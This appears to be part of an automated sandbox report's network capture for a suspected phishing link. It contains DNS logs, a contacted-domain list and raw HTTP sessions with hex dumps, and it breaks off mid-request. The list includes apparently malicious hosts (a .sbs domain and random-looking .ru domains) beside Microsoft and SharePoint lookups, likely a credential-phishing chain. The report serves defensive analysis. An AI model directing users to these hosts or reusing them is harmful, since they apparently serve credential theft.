                                                                              Nov 26, 2024 20:54:38.703974962 CET1.1.1.1192.168.2.160x9034No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703974962 CET1.1.1.1192.168.2.160x9034No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.704322100 CET1.1.1.1192.168.2.160x35dcNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.105773926 CET1.1.1.1192.168.2.160x4da7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.105773926 CET1.1.1.1192.168.2.160x4da7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.105773926 CET1.1.1.1192.168.2.160x4da7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.105773926 CET1.1.1.1192.168.2.160x4da7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.193502903 CET1.1.1.1192.168.2.160x25dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.193520069 CET1.1.1.1192.168.2.160x7e10No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:41.193520069 CET1.1.1.1192.168.2.160x7e10No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833025932 CET1.1.1.1192.168.2.160xe444No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833025932 CET1.1.1.1192.168.2.160xe444No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833226919 CET1.1.1.1192.168.2.160xf851No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833266020 CET1.1.1.1192.168.2.160x5a0fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833709955 CET1.1.1.1192.168.2.160x3bedNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.833709955 CET1.1.1.1192.168.2.160x3bedNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:04.974591017 CET1.1.1.1192.168.2.160x7265No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:04.974591017 CET1.1.1.1192.168.2.160x7265No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:04.974663019 CET1.1.1.1192.168.2.160x9d80No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.662631035 CET1.1.1.1192.168.2.160xef14No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.663608074 CET1.1.1.1192.168.2.160x83f0No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.663608074 CET1.1.1.1192.168.2.160x83f0No error (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:09.009618044 CET1.1.1.1192.168.2.160x47edNo error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:09.042340040 CET1.1.1.1192.168.2.160xd1a9No error (0)www.sharepoint.comsharepoint.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.862955093 CET1.1.1.1192.168.2.160x174aNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.863070965 CET1.1.1.1192.168.2.160xf73No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:16.393943071 CET1.1.1.1192.168.2.160x7003No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:16.394617081 CET1.1.1.1192.168.2.160xe9eNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:19.019459963 CET1.1.1.1192.168.2.160xeb13No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:19.020262957 CET1.1.1.1192.168.2.160x333bNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:20.169975996 CET1.1.1.1192.168.2.160xf5d7No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:20.250086069 CET1.1.1.1192.168.2.160x7c84No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:22.544703960 CET1.1.1.1192.168.2.160x2d9eNo error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:22.545026064 CET1.1.1.1192.168.2.160x47c0No error (0)c.s-microsoft.comc-s.cms.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.410485983 CET1.1.1.1192.168.2.160x9e19No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.410964012 CET1.1.1.1192.168.2.160xa5b4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.249449968 CET1.1.1.1192.168.2.160x4e43No error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.250798941 CET1.1.1.1192.168.2.160x68dcNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.366259098 CET1.1.1.1192.168.2.160xc28dNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.453830957 CET1.1.1.1192.168.2.160x173aNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              • login.live.com
                                                                              • link.mail.beehiiv.com
                                                                              • 3riverscap.sbs
                                                                              • https:
                                                                                • 7x7.jaaqwamco.ru
                                                                                • code.jquery.com
                                                                                • cdnjs.cloudflare.com
                                                                                • challenges.cloudflare.com
                                                                                • uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru
                                                                              • fs.microsoft.com
                                                                              • a.nel.cloudflare.com
                                                                              • slscr.update.microsoft.com
                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              0192.168.2.164970020.190.147.3443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:18 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/soap+xml
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                              Content-Length: 4775
                                                                              Host: login.live.com
                                                                              2024-11-26 19:54:18 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                              2024-11-26 19:54:19 UTC569INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                              Expires: Tue, 26 Nov 2024 19:53:18 GMT
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              x-ms-route-info: C538_SN1
                                                                              x-ms-request-id: b7efc0a3-9360-4ca3-b0d6-1344f61c5561
                                                                              PPServer: PPV: 30 H: SN1PEPF0002FA1D V: 0
                                                                              X-Content-Type-Options: nosniff
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Date: Tue, 26 Nov 2024 19:54:18 GMT
                                                                              Connection: close
                                                                              Content-Length: 11409
                                                                              2024-11-26 19:54:19 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1649708104.18.69.404436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:26 UTC1443OUTGET /ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb HTTP/1.1
                                                                              Host: link.mail.beehiiv.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:27 UTC1280INHTTP/1.1 403 Forbidden
                                                                              Date: Tue, 26 Nov 2024 19:54:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 13517
                                                                              Connection: close
                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Resource-Policy: same-origin
                                                                              Origin-Agent-Cluster: ?1
                                                                              Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              Referrer-Policy: same-origin
                                                                              X-Content-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              cf-mitigated: challenge
                                                                              2024-11-26 19:54:27 UTC652INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 78 6d 56 44 66 33 47 39 71 75 75 71 30 6d 6d 59 47 4f 44 76 78 7a 4e 49 30 45 74 47 65 70 2f 54 37 49 44 50 38 51 73 41 7a 77 33 4a 66 35 59 41 2f 62 5a 31 69 39 33 65 43 4d 4f 73 6f 74 41 2f 4c 74 54 33 4a 30 65 6d 43 34 78 42 47 49 48 66 38 34 6c 6c 61 49 65 41 6f 5a 33 48 49 52 6c 74 51 2b 44 48 38 4d 69 44 57 47 47 44 56 73 67 44 41 44 54 76 33 71 32 4d 71 4b 63 68 38 32 6c 4c 52 63 46 68 67 74 43 79 38 35 6e 39 42 59 38 69 76 57 32 73 71 77 3d 3d 24 4f 41 61 56 64 78 79 41 50 6e 35 4d 4b 52 2f 56 75 66 4a 38 49 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                              Data Ascii: cf-chl-out: xmVDf3G9quuq0mmYGODvxzNI0EtGep/T7IDP8QsAzw3Jf5YA/bZ1i93eCMOsotA/LtT3J0emC4xBGIHf84llaIeAoZ3HIRltQ+DH8MiDWGGDVsgDADTv3q2MqKch82lLRcFhgtCy85n9BY8ivW2sqw==$OAaVdxyAPn5MKR/VufJ8IQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                              2024-11-26 19:54:27 UTC806INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                              2024-11-26 19:54:27 UTC1369INData Raw: 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50
                                                                              Data Ascii: 1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0P
                                                                              2024-11-26 19:54:27 UTC1369INData Raw: 71 34 71 32 5f 4a 42 6e 56 72 35 4c 56 67 74 48 78 6a 69 46 52 4a 32 30 57 7a 34 57 35 6c 4a 32 5f 6f 42 64 37 49 57 6b 4e 6b 33 6d 64 36 79 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 6c 73 5c 2f 63 6c 69 63 6b 3f 75 70 6e 3d 75 30 30 31 2e 4b 44 44 61 34 53 4b 48 39 31 67 63 6e 43 49 6d 31 33 46 55 44 6a 42 6b 38 44 6e 6f 7a 77 6b 53 64 78 65 2d 32 42 4c 4d 43 4a 41 61 38 54 69 4b 44 68 64 2d 32 42 33 38 70 6c 37 38 32 50 6e 6c 4b 72 6d 67 7a 51 54 6a 44 38 66 41 54 64 6e 77 63 35 51 67 6e 65 71 64 55 6a 57 59 78 35 44 38 32 51 43 32 4a 61 6a 4b 4f 44 35 64 68 77 51 66 36 6e 42 53 39 78 36 50 78 41 43 64 78 71 5a 2d 32 42 56 76 66 58 53 46 72 35 33 36 64 45 6c 37 31 5a 34 2d 32 42 30 6c 4b 58 72 6c 42 71 32 49 37 4f 47 4f 55 66 65 39 64 30 71 55 36 43
                                                                              Data Ascii: q4q2_JBnVr5LVgtHxjiFRJ20Wz4W5lJ2_oBd7IWkNk3md6y2',cUPMDTk: "\/ls\/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6C
                                                                              2024-11-26 19:54:27 UTC1369INData Raw: 30 50 48 41 5f 5a 46 33 37 42 4a 73 53 70 65 67 32 67 67 4b 72 6f 30 4b 77 31 4a 5a 69 32 51 37 58 35 6c 4d 52 34 47 63 51 55 52 2d 32 46 35 47 50 50 64 6b 74 71 68 4a 58 65 43 2d 32 42 73 79 37 31 75 49 79 6c 4d 4c 36 58 58 6b 4c 53 31 46 59 61 78 46 4d 34 39 35 5a 46 35 48 66 54 30 6b 77 33 37 56 79 35 4a 45 67 49 61 75 35 35 48 61 67 73 44 50 50 32 57 6e 69 45 4b 51 64 52 56 55 79 51 4a 44 61 48 34 77 2d 32 46 32 70 36 4b 75 77 47 48 55 4b 55 45 42 33 38 6e 68 63 39 32 74 38 68 58 4c 6a 62 75 2d 32 46 78 4b 51 71 78 70 41 66 2d 32 46 49 42 31 45 64 45 63 75 44 50 56 67 4d 63 77 57 6f 5a 4b 56 36 2d 32 46 71 56 33 48 72 44 6e 78 71 6a 63 65 56 76 34 43 58 78 74 6a 5a 32 4a 6b 4f 2d 32 46 55 51 39 4f 36 38 44 70 43 4d 2d 32 46 35 64 4d 76 54 2d 32 46 61
                                                                              Data Ascii: 0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2Fa
                                                                              2024-11-26 19:54:27 UTC1369INData Raw: 75 59 52 6c 44 52 34 54 4c 4a 67 38 68 57 31 46 61 71 66 71 55 56 64 55 47 72 4c 4f 63 57 63 59 79 65 59 6e 70 78 77 69 4a 34 71 57 4c 37 67 58 46 4e 75 7a 79 62 74 77 49 64 49 35 42 5a 4e 4c 4a 74 54 52 42 6f 6e 66 39 48 68 73 4d 65 68 45 74 76 76 52 44 58 79 33 39 44 75 59 61 6a 47 48 46 4e 72 56 4d 64 6e 38 68 61 46 48 77 52 5f 72 39 44 39 74 64 39 38 33 50 41 58 53 6d 4c 55 35 61 59 78 6d 49 68 4c 77 4a 68 4b 49 54 79 61 56 6e 5a 59 51 65 33 4c 4f 45 4e 4c 53 34 66 78 56 4e 4a 33 55 6d 42 6c 34 6c 79 6f 77 64 50 64 4b 38 61 6c 6a 4f 62 67 41 6d 73 4f 64 62 57 57 42 70 4f 48 6f 4f 35 43 74 5a 42 69 47 78 72 69 47 79 6f 75 7a 32 48 66 33 77 70 67 4c 38 74 2e 62 4b 6a 53 58 51 58 52 31 61 75 50 79 76 6f 6d 6a 61 34 75 75 34 69 45 55 5f 7a 6c 42 6a 73 67
                                                                              Data Ascii: uYRlDR4TLJg8hW1FaqfqUVdUGrLOcWcYyeYnpxwiJ4qWL7gXFNuzybtwIdI5BZNLJtTRBonf9HhsMehEtvvRDXy39DuYajGHFNrVMdn8haFHwR_r9D9td983PAXSmLU5aYxmIhLwJhKITyaVnZYQe3LOENLS4fxVNJ3UmBl4lyowdPdK8aljObgAmsOdbWWBpOHoO5CtZBiGxriGyouz2Hf3wpgL8t.bKjSXQXR1auPyvomja4uu4iEU_zlBjsg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1649707104.18.69.404436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:27 UTC1882OUTGET /ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb HTTP/1.1
                                                                              Host: link.mail.beehiiv.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-full-version: "117.0.5938.132"
                                                                              sec-ch-ua-arch: "x86"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              sec-ch-ua-platform-version: "10.0.0"
                                                                              sec-ch-ua-model: ""
                                                                              sec-ch-ua-bitness: "64"
                                                                              sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
